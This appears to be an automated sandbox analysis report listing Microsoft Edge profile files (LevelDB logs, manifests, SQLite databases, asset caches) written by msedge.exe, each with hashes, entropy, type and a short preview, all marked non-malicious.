                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):307
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.217672965600347
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:tQ2s1923oH+Tcwtp3hBtB2KLlzoF0N9+q2P923oH+Tcwtp3hBWsIFUv:fYebp3dFLv+v4Yebp3eFUv
                                                                                                                                                                                                                                                                                                  MD5:4FFA89A635589FFF012D259F03A67906
                                                                                                                                                                                                                                                                                                  SHA1:8B1FC45DBBBEA62BE7DD19B4901FAD6405230066
                                                                                                                                                                                                                                                                                                  SHA-256:3818E9A3482AE784B59B71D40B8BBAAA230BA8B42AA648F021AB4F28BC568A3A
                                                                                                                                                                                                                                                                                                  SHA-512:15A44327FA13DDC33CE0B887EE1A535AF34E893844639E372920BC7D504DD88BF4E9DD68FB87B163232A8B0DF4D59DE95C80AB01B22BE2E017BE7D5C17ADDA29
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:25.440 99c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/23-00:24:25.470 99c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):2163821
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.222867265681474
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24576:v+/PN8FpfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8Xfx2mjF
                                                                                                                                                                                                                                                                                                  MD5:A9738AEEC89E5EB423C35AC886BB6636
                                                                                                                                                                                                                                                                                                  SHA1:6BDD095B8C3C48819956E2788100708E870F3E81
                                                                                                                                                                                                                                                                                                  SHA-256:22761E3D8AED809644B9464B63F3046B7EA1EA2406E28C7A5C4AF5534838AA09
                                                                                                                                                                                                                                                                                                  SHA-512:848258C7CE97BC63AB92674459D0C2A489119EEAE35D95AFEA6F3A015025663FCFD1CBBD20A31B94B0A0852DB45C90CAFA0DB6A832D82E5636072122BEB0946A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):333
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1033698608709965
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:S+q2P923oH+Tcwt9Eh1tIFUt8OjZmw+nVkwO923oH+Tcwt9Eh15LJ:S+v4Yeb9Eh16FUt8c/+nV5LYeb9Eh1VJ
                                                                                                                                                                                                                                                                                                  MD5:F14A4245171EDAC7DA6C052438933626
                                                                                                                                                                                                                                                                                                  SHA1:C789D90FEF37C2B29AFF7EBB363F6105E0CA749A
                                                                                                                                                                                                                                                                                                  SHA-256:AD63ABFF469F56B0408B11B08D51119E7D8104E542D6C1FE46F638A68468F007
                                                                                                                                                                                                                                                                                                  SHA-512:0972A8D3A37C92237BDA02F45CAE5AF13804BD5DF4373A6F843BF1FC5D42D0AED6C6C3B8394E8FB838D86E956F35E0CF604E30ED546B03BF0550F9477FDE8F97
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:26.337 bbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/23-00:24:26.341 bbc Recovering log #3.2024/12/23-00:24:26.391 bbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):333
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1033698608709965
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:S+q2P923oH+Tcwt9Eh1tIFUt8OjZmw+nVkwO923oH+Tcwt9Eh15LJ:S+v4Yeb9Eh16FUt8c/+nV5LYeb9Eh1VJ
                                                                                                                                                                                                                                                                                                  MD5:F14A4245171EDAC7DA6C052438933626
                                                                                                                                                                                                                                                                                                  SHA1:C789D90FEF37C2B29AFF7EBB363F6105E0CA749A
                                                                                                                                                                                                                                                                                                  SHA-256:AD63ABFF469F56B0408B11B08D51119E7D8104E542D6C1FE46F638A68468F007
                                                                                                                                                                                                                                                                                                  SHA-512:0972A8D3A37C92237BDA02F45CAE5AF13804BD5DF4373A6F843BF1FC5D42D0AED6C6C3B8394E8FB838D86E956F35E0CF604E30ED546B03BF0550F9477FDE8F97
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:26.337 bbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/23-00:24:26.341 bbc Recovering log #3.2024/12/23-00:24:26.391 bbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.46319446808903936
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5GV:TouQq3qh7z3bY2LNW9WMcUvBuUV
                                                                                                                                                                                                                                                                                                  MD5:E258EBC3455F64E3754694333E086FF4
                                                                                                                                                                                                                                                                                                  SHA1:27432F5A98F3A8C6A580A146C2F90EB21901072A
                                                                                                                                                                                                                                                                                                  SHA-256:40106890103D5AC3EB609E7D2A2A658D35B30A70D4DFEB51C291C680CF1F4AC1
                                                                                                                                                                                                                                                                                                  SHA-512:55B05CCB0CF0F4208CE51B8E8ABD4E45F2B586A4A58BF03867ECD7A79FCD07975EEBBDBBF709542F58F69ADE70606CC1AF88E1EDDFFBE0EB532E20C952FBB535
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                  MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                  SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                  SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                  SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):348
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1285157050283425
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:L8d3+q2P923oH+TcwtnG2tMsIFUt8KzZZmw+KzNVkwO923oH+TcwtnG2tMsLJ:oOv4Yebn9GFUt8KN/+K/5LYebn95J
                                                                                                                                                                                                                                                                                                  MD5:1AB0FF499DF0E7AFFD79E394908AB4B1
                                                                                                                                                                                                                                                                                                  SHA1:B12C5E4E8702C201F15A14290085345E54A7126C
                                                                                                                                                                                                                                                                                                  SHA-256:B1FB05BBD730189996EC8A528BDBC35EB1BC23178E8077FEE5EFBCFEF7C16544
                                                                                                                                                                                                                                                                                                  SHA-512:B739970C6BAFFA3045D055AF7EDD225CB9AFDE66D389E75BD2E45FB1E8D9E698A9F540E62640E3B030CB8763A30EC7E20E6910928578B4DBC8FE2BF939D05067
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:19.999 1c18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/23-00:24:20.000 1c18 Recovering log #3.2024/12/23-00:24:20.000 1c18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):348
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1285157050283425
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:L8d3+q2P923oH+TcwtnG2tMsIFUt8KzZZmw+KzNVkwO923oH+TcwtnG2tMsLJ:oOv4Yebn9GFUt8KN/+K/5LYebn95J
                                                                                                                                                                                                                                                                                                  MD5:1AB0FF499DF0E7AFFD79E394908AB4B1
                                                                                                                                                                                                                                                                                                  SHA1:B12C5E4E8702C201F15A14290085345E54A7126C
                                                                                                                                                                                                                                                                                                  SHA-256:B1FB05BBD730189996EC8A528BDBC35EB1BC23178E8077FEE5EFBCFEF7C16544
                                                                                                                                                                                                                                                                                                  SHA-512:B739970C6BAFFA3045D055AF7EDD225CB9AFDE66D389E75BD2E45FB1E8D9E698A9F540E62640E3B030CB8763A30EC7E20E6910928578B4DBC8FE2BF939D05067
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:19.999 1c18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/23-00:24:20.000 1c18 Recovering log #3.2024/12/23-00:24:20.000 1c18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6141786893107009
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+j/7D/pN7DLmL:TO8D4jJ/6Up+nfE
                                                                                                                                                                                                                                                                                                  MD5:D6B6383AA51F75EC2DC5997E2D976522
                                                                                                                                                                                                                                                                                                  SHA1:665346ED9537785C8D47833F0C1711F22E71EA24
                                                                                                                                                                                                                                                                                                  SHA-256:01F615D08FDC775B7AFDBBC1818A87972984E4226427F216AC0A5003AF97E1E1
                                                                                                                                                                                                                                                                                                  SHA-512:C57A995935A468AEF966AE03AD7E79F695DCA13D09C6F03F32AF5EC30472D97BB5F541A063A58AA0AC96F135BBD924A3BE0C319C00CE749F1A63D796F7D147AD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.354138250226695
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6144:PA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:PFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                  MD5:D05C4351F899FF00E3DD3C4597AACC3B
                                                                                                                                                                                                                                                                                                  SHA1:90DEC0CE73CF6B2054F502DF31FA1B508A403C01
                                                                                                                                                                                                                                                                                                  SHA-256:C8F2BEB5497F5C78C12F1CC7DB5E78ABD0ECF1326CD6D9109A22286A559F7817
                                                                                                                                                                                                                                                                                                  SHA-512:E95E57AC56ADDDE6C2C705861D383C6AEE4D8732F94332E0EA3D20D7A11EDF2A46F9FC51978596A455CAAF69BFBD8473086A0790569E60E73BA2520704F14346
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1...Wq...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379405069183634..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):309
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.125556318926299
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:4D1923oH+Tcwtk2WwnvB2KLlpO+q2P923oH+Tcwtk2WwnvIFUv:VYebkxwnvFLXO+v4YebkxwnQFUv
                                                                                                                                                                                                                                                                                                  MD5:F39D016B9637B3538D264E57E8F5F466
                                                                                                                                                                                                                                                                                                  SHA1:38A71F5FC51BB1A4D3B94219668F4BEC5666FDF0
                                                                                                                                                                                                                                                                                                  SHA-256:FBB68497C3E4D9ABAA8A40668864347C1C78E243D814A572452657B910810B7E
                                                                                                                                                                                                                                                                                                  SHA-512:454943960493EA3C93A18D0FAFB46A5095AD3366946717EE42811F5B26897C4C89CE975CBC441CB26A890FE67E010D834BF516EFACD20791E84C5905F6793DC8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:26.402 43c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/23-00:24:26.909 43c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):41
